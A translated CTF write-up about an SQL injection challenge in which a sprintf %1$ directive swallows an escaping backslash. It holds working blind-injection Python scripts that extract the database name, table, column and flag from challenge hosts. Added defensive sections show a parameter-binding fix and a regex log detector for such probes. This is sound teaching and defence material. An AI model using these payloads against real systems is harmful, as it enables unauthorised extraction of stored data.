"Celebrate Christmas, Win Big Prizes" event challenge ------------ SQLi

Copyright notice: this article is the blogger's original work and may not be reproduced without permission. https://blog.csdn.net/nzjdsds/article/details/82152085

=========================================

Personal takeaways

1. The sprintf format-string vulnerability

=========================================

The challenge

I started by scanning directories and looking at the source and the HTTP requests. Nothing looked unusual, so it was almost certainly SQL injection.


I first wanted to try a "universal password" (a classic tautology login bypass), but found it was filtered.

Trying to log in with admin/admin

shows that an admin user exists.

Here I first used my own dictionary to see which characters the site filters.

Every other character produced the prompt [username error!]

Only % produced a different prompt.

The sprintf function is used here, and sprintf has a vulnerability: https://blog.csdn.net/nzjdsds/article/details/82156123

We directly use the method from that article, in which %1$ swallows the backslash, to construct the payload.

First, following the article's method, try admin%1$\' and 1=1%23

The result was username error!. Based on the initial tests, if and 1=1 had executed successfully it should have returned password error!, so I guessed that "and" was filtered.

Next, try an or statement instead.

We can see that the or statement executed successfully, so now it is time for blind injection.
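To make the mechanism behind the %1$ trick concrete, here is an added Python model; it is not code from the write-up, the referenced article or the challenge. php7_like_sprintf is a deliberately small imitation of how the PHP 7 printf family consumes one conversion character after an optional N$ prefix and emits nothing for an unknown one (the behaviour the write-up relies on); addslashes mimics PHP's function of the same name. The users table, the password value and all helper names are assumptions. The model shows the escaped quote reappearing once the escaped string is used as the format, and, beside it, the hardened form in which the driver binds the values so the same input is just a string:

```python
import re
import sqlite3

# Constructed stand-in for the challenge's login table (made-up data, not the target's).
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
conn.execute("INSERT INTO users VALUES ('admin', 'correct horse battery staple')")


def addslashes(s):
    """Mimic PHP addslashes(): backslash-escape backslashes and quotes."""
    return s.replace("\\", "\\\\").replace("'", "\\'").replace('"', '\\"')


# One printf directive: '%', optional positional prefix 'N$', exactly one conversion char.
_DIRECTIVE = re.compile(r"%(\d+\$)?(.)", re.S)


def php7_like_sprintf(fmt, *args):
    """Toy model (assumption) of PHP 7 sprintf() directive handling.

    '%%' yields a literal percent, '%s' / '%N$s' substitute an argument, and any
    other conversion character (such as a backslash) is consumed and emits
    nothing.  That swallowed character is what makes the %1$ trick work.
    """
    pos = [0]  # next sequential argument

    def substitute(m):
        index, conv = m.group(1), m.group(2)
        if conv == "%":
            return "%"
        if conv == "s":
            if index:
                return str(args[int(index[:-1]) - 1])
            pos[0] += 1
            return str(args[pos[0] - 1])
        return ""  # unknown directive: swallowed

    return _DIRECTIVE.sub(substitute, fmt)


def build_query_vulnerable(username, password):
    """The broken pattern: escape first, then paste the result into the format
    string.  The escaped username is now *part of the format* and is re-parsed."""
    fmt = ("SELECT username FROM users WHERE username='"
           + addslashes(username) + "' AND password='%s'")
    return php7_like_sprintf(fmt, addslashes(password))


def first_unescaped_quote(body):
    """Index of the first quote that would close a MySQL single-quoted literal
    (a backslash escapes the following character), or -1 if there is none."""
    i = 0
    while i < len(body):
        if body[i] == "\\":
            i += 2
            continue
        if body[i] == "'":
            return i
        i += 1
    return -1


def username_breaks_out(sql):
    """True if the username literal closes before the ' AND password=' clause,
    i.e. the remainder of the user input is parsed as SQL."""
    body = sql.split("username='", 1)[1]
    return first_unescaped_quote(body) < body.index("' AND password=")


def login_safe(username, password):
    """Hardened form: user input never touches the query text; the driver binds
    it as a value, so %1$, backslashes and quotes are ordinary characters."""
    row = conn.execute(
        "SELECT 1 FROM users WHERE username=? AND password=?",
        (username, password),
    ).fetchone()
    return row is not None


# The write-up's bypass shape, constructed here for the demonstration.
PAYLOAD = "admin%1$\\' or 1=1#"

if __name__ == "__main__":
    vuln = build_query_vulnerable(PAYLOAD, "111")
    print(vuln)                              # username='admin\\' or 1=1#' ...
    print(username_breaks_out(vuln))         # True: the literal closes early
    print(username_breaks_out(build_query_vulnerable("admin\\' or 1=1#", "111")))  # False
    print(login_safe(PAYLOAD, "111"))        # False
```

The contrast between the two build_query_vulnerable calls is the whole point: without the %1$ prefix, addslashes keeps the literal closed, so the escaping itself is not the defect; feeding the escaped text back through a formatter is. Parameter binding removes that ordering problem entirely.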

(The following is reposted from https://www.cnblogs.com/Ragd0ll/p/8745597.html)

First, find the length of the current database:

#coding:utf-8
# Step 1: boolean-based blind injection to find the length of the current database name.
# The login page answers "password error!" when the injected condition is true
# and "username error!" when it is false, which is the oracle used throughout.
import requests
import string

dic = string.digits + string.ascii_letters + "!@#$%^&*()_+{}-="
right = 'password error!'   # injected condition was true
worry = 'username error!'   # injected condition was false
url = 'http://ad38630038fd4c87bd8e55c7bd876412d064d626a2e64cae.game.ichunqiu.com/'
for i in range(30):
    # %1$ makes sprintf swallow the backslash added by escaping, so the quote closes the literal
    key = "admin%1$\\' or " + "(length(database())=" + str(i) + ")#"
    data = {'username': key, 'password': '111'}
    r = requests.post(url, data=data).text
    if right in r:
        print('the length of database is %s' % i)

# Step 2: recover the database name one character at a time (positions 1 to 3).
import requests
import string

dic = string.digits + string.ascii_letters + "!@#$%^&*()_+{}-="
right = 'password error!'   # injected condition was true
worry = 'username error!'   # injected condition was false
url = 'http://ad38630038fd4c87bd8e55c7bd876412d064d626a2e64cae.game.ichunqiu.com/'

database = ''
for j in range(1, 4):
    for each in dic:
        key = "admin%1$\\' or " + "(ascii(substr(database(),%s,1))=" % j + str(ord(each)) + ")#"
        data = {'username': key, 'password': '111'}
        r = requests.post(url, data=data).text
        print(key)
        if right in r:
            database += each
            print(each)
            break
print('the name of database is %s' % database)

# Step 3: find the length of the first table name in the current database.
import requests
import string

dic = string.digits + string.ascii_letters + "!@#$%^&*()_+{}-="
right = 'password error!'   # injected condition was true
worry = 'username error!'   # injected condition was false
url = 'http://ad38630038fd4c87bd8e55c7bd876412d064d626a2e64cae.game.ichunqiu.com/'
i = 1
while True:
    key = "admin%1$\\' or " + "(select length(table_name) from information_schema.tables where table_schema=database() limit 0,1)=" + str(i) + "#"
    data = {'username': key, 'password': '111'}
    r = requests.post(url, data=data).text
    print(r)
    if right in r:
        print('the length of tables is %s' % i)
        break
    i += 1

# Step 4: recover the first table name character by character (positions 1 to 4).
# Note: a fresh challenge instance was started here, hence the different URL.
import requests
import string

dic = string.digits + string.ascii_letters + "!@#$%^&*()_+{}-="
right = 'password error!'   # injected condition was true
worry = 'username error!'   # injected condition was false
url = 'http://335ba99138724fb9938bd2756b0c7ba5aba7efad86a84ab9.game.ichunqiu.com/'
table = ''
for i in range(1, 5):
    for j in dic:
        key = "admin%1$\\' or " + "(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),%s,1))=" % i + str(ord(j)) + ")#"
        data = {'username': key, 'password': '111'}
        r = requests.post(url, data=data).text
        print(key)
        if right in r:
            table += j
            print(j)
            break
print('the name of table is %s' % table)

In the code that follows I omit the definitions of url, dic and so on, and give only the test statements (the test statements are simple anyway: just tweak the ones used above to enumerate the tables).

# Step 5: length of the first column name in the table `flag` (0x666c6167 is "flag" in hex,
# which avoids sending quotes). Assumes url, right and dic as defined above.
i = 1
while True:
    key = "admin%1$\\' or " + "(select length(column_name) from information_schema.columns where table_name=0x666c6167 limit 0,1)=" + str(i) + "#"
    data = {'username': key, 'password': '111'}
    r = requests.post(url, data=data).text
    print(r)
    if right in r:
        print('the length of columns is %s' % i)
        break
    i += 1

# Step 6: recover the column name character by character (positions 1 to 4).
column = ''
for i in range(1, 5):
    for j in dic:
        key = "admin%1$\\' or " + "(ascii(substr((select column_name from information_schema.columns where table_name=0x666c6167 limit 0,1),%s,1))=" % i + str(ord(j)) + ")#"
        data = {'username': key, 'password': '111'}
        r = requests.post(url, data=data).text
        print(key)
        if right in r:
            column += j
            print(j)
            break
print('the name of column is %s' % column)

# Step 7: length of the value stored in flag.flag.
i = 1
while True:
    key = "admin%1$\\' or " + "(select length(flag) from flag limit 0,1)=" + str(i) + "#"
    data = {'username': key, 'password': '111'}
    r = requests.post(url, data=data).text
    print(key)
    if right in r:
        print('the length of data is %s' % i)
        break
    i += 1

# Step 8: recover the flag character by character (positions 1 to 42, from step 7).
flag = ''
for i in range(1, 43):
    for j in dic:
        key = "admin%1$\\' or " + "(ascii(substr((select flag from flag limit 0,1),%s,1))=" % i + str(ord(j)) + ")#"
        data = {'username': key, 'password': '111'}
        r = requests.post(url, data=data).text
        print(key)
        if right in r:
            flag += j
            print(j)
            break
print('the flag is %s' % flag)

The key to this challenge is knowing the sprintf format-string vulnerability; the blind injection that followed did not filter the relevant keywords, so it went through without resistance.
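From the defender's side, the traffic this write-up generates has a very recognisable shape: a positional printf directive in a form field, OR followed by a metadata or character function, a trailing MySQL comment, and hundreds of near-identical requests from one client that differ only in a number. The following added example (not part of the original post) runs those three rules over a few constructed log lines in the shape of the challenge's login requests; the log format, field names and sample values are assumptions made for the demonstration:

```python
import re
from urllib.parse import unquote_plus

# Constructed sample of a web server's POST log (fields: client, method, path, body).
# These lines are made up in the shape of the challenge's login traffic, not real captures.
SAMPLE_LOG = """\
10.0.0.5 POST /login.php username=admin&password=111
10.0.0.5 POST /login.php username=admin%251%24%5C%27+or+%28length%28database%28%29%29%3D4%29%23&password=111
10.0.0.7 POST /login.php username=o%27brien&password=hunter2
10.0.0.5 POST /login.php username=admin%251%24%5C%27+or+%28ascii%28substr%28database%28%29%2C1%2C1%29%29%3D115%29%23&password=111
10.0.0.9 POST /login.php username=50%25+off+coupon&password=x
"""

# Rule 1: a positional printf directive (%N$) inside a form field is never a normal username.
POSITIONAL_DIRECTIVE = re.compile(r"%\d+\$")
# Rule 2: boolean-blind probe shape: OR/AND followed by a metadata or character function.
BLIND_PROBE = re.compile(
    r"\b(?:or|and)\b\s*\(?\s*(?:length|ascii|substr|substring|database|information_schema)\b",
    re.I,
)
# Rule 3: MySQL comment terminator at the end of the value, used to discard the rest of the query.
TRAILING_COMMENT = re.compile(r"(?:#|--\s)\s*$")


def parse_line(line):
    """Split one constructed log line into client, path and decoded form fields."""
    client, _method, path, body = line.split(" ", 3)
    fields = {}
    for pair in body.split("&"):
        key, _, value = pair.partition("=")
        fields[key] = unquote_plus(value)  # decode once, as the server does: %25->%, %24->$, +->space
    return client, path, fields


def findings_for(value):
    """Return the names of the rules that match a decoded field value."""
    hits = []
    if POSITIONAL_DIRECTIVE.search(value):
        hits.append("positional_format_directive")
    if BLIND_PROBE.search(value):
        hits.append("boolean_blind_probe")
    if TRAILING_COMMENT.search(value):
        hits.append("trailing_sql_comment")
    return hits


def scan(log_text, field="username"):
    """Run the rules over every line of the log.

    Returns (alerts, probes_per_client).  The per-client count is what turns a
    single suspicious request into a blind-injection pattern: the scripts in
    this write-up send one request per candidate character, all from one client.
    """
    alerts, per_client = [], {}
    for line in log_text.splitlines():
        if not line.strip():
            continue
        client, path, fields = parse_line(line)
        hits = findings_for(fields.get(field, ""))
        if hits:
            alerts.append({"client": client, "path": path, "value": fields[field], "rules": hits})
            per_client[client] = per_client.get(client, 0) + 1
    return alerts, per_client


if __name__ == "__main__":
    alerts, per_client = scan(SAMPLE_LOG)
    for a in alerts:
        print(a["client"], a["rules"], repr(a["value"]))
    print("probes per client:", per_client)
```

The rules run on the decoded value rather than the raw log line, so `%251%24` (the URL-encoded form of `%1$`) is caught, while a legitimate percent sign in "50% off coupon" and the apostrophe in "o'brien" raise nothing. In practice the per-client counter is the strongest signal: a password-guessing user produces a handful of failures, whereas the enumeration scripts above produce one request per dictionary character per position.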
